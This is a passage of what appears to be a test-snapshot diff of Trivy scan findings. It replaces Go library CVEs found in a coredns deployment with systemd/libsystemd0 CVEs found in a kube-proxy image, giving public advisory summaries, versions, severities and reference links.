"https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3843", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", + "name": "systemd: services with DynamicUser can create SUID/SGID binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-31525", + "value": "https://avd.aquasec.com/nvd/cve-2019-3843", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-31525", + "value": "http://www.securityfocus.com/bid/108116", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", + "value": "https://access.redhat.com/security/cve/CVE-2019-3843", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/45710", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", }, { "type": "URL", - "value": "https://go.dev/cl/313069", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", }, { "type": "URL", - "value": "https://go.dev/issue/45710", + "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0236", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "value": "https://usn.ubuntu.com/4269-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3844", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "http://www.securityfocus.com/bid/108096", + "https://access.redhat.com/security/cve/CVE-2019-3844", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "https://linux.oracle.com/cve/CVE-2019-3844.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3844", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2019-3844", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "http://www.securityfocus.com/bid/108096", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://access.redhat.com/security/cve/CVE-2019-3844", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "241-7~deb10u9", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-26604", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-26604", + "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "https://github.com/systemd/systemd/issues/5666", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "https://security.netapp.com/advisory/ntap-20230505-0009/", + "https://www.cve.org/CVERecord?id=CVE-2023-26604", + ], + }, + "category": "Vulnerability", + "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "privilege escalation via the less pager", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://avd.aquasec.com/nvd/cve-2023-26604", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://access.redhat.com/security/cve/CVE-2023-26604", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://github.com/systemd/systemd/issues/5666", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20201015000850-e3ed0017c211", - "packageName": "golang.org/x/sys", + "fixedVersion": "241-7~deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33910", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "https://access.redhat.com/security/cve/CVE-2021-33910", + "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "https://linux.oracle.com/cve/CVE-2021-33910.html", + "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20211104-0008/", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "https://www.debian.org/security/2021/dsa-4942", + "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2021-33910", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://access.redhat.com/security/cve/CVE-2021-33910", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2021/dsa-4942", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + }, + { + "type": "URL", + "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.3", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3997", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://access.redhat.com/security/cve/CVE-2021-3997", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5226-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "https://www.openwall.com/lists/oss-security/2022/01/10/2", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "https://avd.aquasec.com/nvd/cve-2021-3997", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "https://access.redhat.com/security/cve/CVE-2021-3997", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://ubuntu.com/security/notices/USN-5226-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.3", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": 